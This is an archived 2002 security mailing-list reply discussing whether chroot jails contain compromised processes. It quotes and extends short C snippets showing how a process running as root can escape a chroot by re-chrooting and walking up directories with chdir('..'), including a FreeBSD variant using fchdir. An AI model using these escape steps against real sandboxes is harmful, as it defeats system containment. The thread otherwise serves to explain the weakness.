Re: OT? Are chroots immune to buffer overflows?

From: Nelson Sampaio Araujo Junior (nelsonat_private)
Date: Fri May 24 2002 - 06:04:15 PDT

Next message: Steve Bremer: "Re: OT? Are chroots immune to buffer overflows?"

Previous message: frog frog: "COWS continuation"
In reply to: Luciano Miguel Ferreira Rocha: "Re: OT? Are chroots immune to buffer overflows?"
Next in thread: aazubel: "Re: OT? Are chroots immune to buffer overflows?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,

> But If you are able to run code as root, a few syscalls are still available to you :
> inserting modules and ptrace().

> If you're able to run code as root, all you need, in most Un*x systems,
> is:
> mkdir("blah");
> chroot("blah");
> chdir("../../../../../../");
> chroot(".");
> execl("/bin/bash", "bash", NULL);

> On others Un*x systems, like some BSDs, an implicit chdir(".") is always
> made after a chroot, so this doesn't work, but you can still do mknod(2),
> mount(2), etc..

To start working and prevent this "bug" :) in FreeBSD you can do the following:

mkdir("blah");
f = fopen("./afile", "w+");
chroot("blah");
fchdir(f);                                    <== this will prevent the "bug"
for(int i=0; i<10000; i++)
  chdir("..");
chroot(".");

Of course, you can enchance the above code to be more efficient just
by checking the chdir result.

Regards,
Nelson Junior
nelsonat_private
nelsonat_private

Next message: Steve Bremer: "Re: OT? Are chroots immune to buffer overflows?"
Previous message: frog frog: "COWS continuation"
In reply to: Luciano Miguel Ferreira Rocha: "Re: OT? Are chroots immune to buffer overflows?"
Next in thread: aazubel: "Re: OT? Are chroots immune to buffer overflows?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri May 24 2002 - 17:24:33 PDT